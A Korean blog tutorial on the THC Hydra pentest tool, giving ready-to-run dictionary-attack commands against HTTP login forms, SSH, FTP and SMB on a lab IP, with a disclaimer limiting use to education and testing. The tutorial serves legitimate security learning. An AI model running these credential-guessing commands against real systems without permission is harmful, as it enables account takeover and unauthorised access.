본문 바로가기
IT Tools

Dictionary Attack - THC Hydra 툴 사용법

by 떠도리c 2024. 8. 29.
반응형

교육 / 테스트 용도로 사용하시기 바라며, 실제 서비스 운영중인 대상으로 사용은 자제 바랍니다.

 

Dictionary Attack - THC Hydra 툴 사용법

 

 

Dictionary Attack - THC Hydra

"The Hacker's Choice"(THC)라는 단체에서 개발하여 배포하는 명령행 기반의 모의침투(pentest) 도구이다.

SSH, TELENT, HTTP, HTTPS, FTP, LDAP, SMB, SNMP, POP3 등 다수의 통신규약에 대해 사전기반 비밀번호

공격도구이며, 웹취약점분석에서는 관리자나 사용자 계정을 취약하게 관리하는 지의 여부를 점검할 수 있다.

칼리리눅스에 기본 설치되어 있다.

Dictionary 다운로드

  • 이미 만들어진 Dictionary 파일을 받고싶다면 구글에
    'id dictionary','password dictionary'와 같이 검색하면 공유된 Dictionary  파일을 다운 받을 수 있음.
  • 만들어져 있는 패턴 예

 

Hydra 사용법

 

HTTP POST 방식의 로그인 공격

$ hydra [Target IP] http-form-post "[PATH][parameters][failed login message]" -L [username file] -P [password file]

e.g. hydra 192.168.0.200 http-form-post "/admin/login.jsp:user=^USER^&pass=^PASS^:Wrong ID/PASSWORD" -L weakuser.txt -P weakpass.txt

# POST 방식으로 192.168.0.200/admin/login.jsp 경로 접근한다.

# user, pass 파라미터의 값은 weakuser.txt, weakpass.txt 파일을 참조하여 순차적으로 대입한다.

  • -L : username file을 사용 할 경우 (weakuser.txt와 같이)
  • -l : username을 고정해서 사용 할 경우 (admin, root 이런식)
  • -P : password file을 사용 할 경우 (weakpass.txt와 같이)
  • -p : password를 고정해서 사용 할 경우 (p@ssw0rd 이런식)

SSH에 대한 무작위대입 공격

 
$ hydra -L [username file] -P [password file] [target ip] ssh
 
e.g. hydra -L weakuser.txt -P weakpass.txt 192.168.0.200 ssh
 
 
# 목적지 IP 192.168.0.200으로 ssh 통신
# 계정과 비밀번호는 weakuser.txt, weakpass.txt 파일을 참조하여 순차적으로 대입한다.
  • -L : username file을 사용 할 경우 (weakuser.txt와 같이)
  • -l : username을 고정해서 사용 할 경우 (admin, root 이런식)
  • -P : password file을 사용 할 경우 (weakpass.txt와 같이)
  • -p : password를 고정해서 사용 할 경우 (p@ssw0rd 이런식)

FTP에 대한 무작위대입 공격

$ hydra -L [username file] -P [password file] [target ip] ftp
또는 $ hydra -L [username file] -P [password file] ftp://[target ip]
 
e.g. hydra -L weakuser.txt -P weakpass.txt 192.168.0.200 ftp
 
 
# 목적지IP 192.168.0.200으로 FTP 통신
# 계정과 비밀번호는 weakuser.txt, weakpass.txt 파일을 참조하여 순차적으로 대입한다.
 
  • -L : username file을 사용 할 경우 (weakuser.txt와 같이)
  • -l : username을 고정해서 사용 할 경우 (admin, root 이런식)
  • -P : password file을 사용 할 경우 (weakpass.txt와 같이)
  • -p : password를 고정해서 사용 할 경우 (p@ssw0rd 이런식)

기본적으로 사용 방법은 비슷하며 공격 프로토콜을 변경하고 싶다면, 프로토콜명만 변경해주면 된다.

예를들어 smb로 변경하고 싶다면
$ hydra -l admin -p p@ssw0rd smb://192.168.0.200 이런식으로 하면 된다.

반응형
저작자표시 비영리 변경금지

'IT Tools' 카테고리의 다른 글

OSINT - amass Tool 사용법  (0) 2024.08.29
Sniffing - hping3 툴 사용법  (0) 2024.08.29
Brute force Dictionary 만들기 - Crunch 툴  (0) 2024.08.26
스캐닝 툴 - Nmap 사용법  (0) 2024.08.26
악성코드 기초 분석 툴 종류 및 사용법  (0) 2024.08.26

관련글

티스토리툴바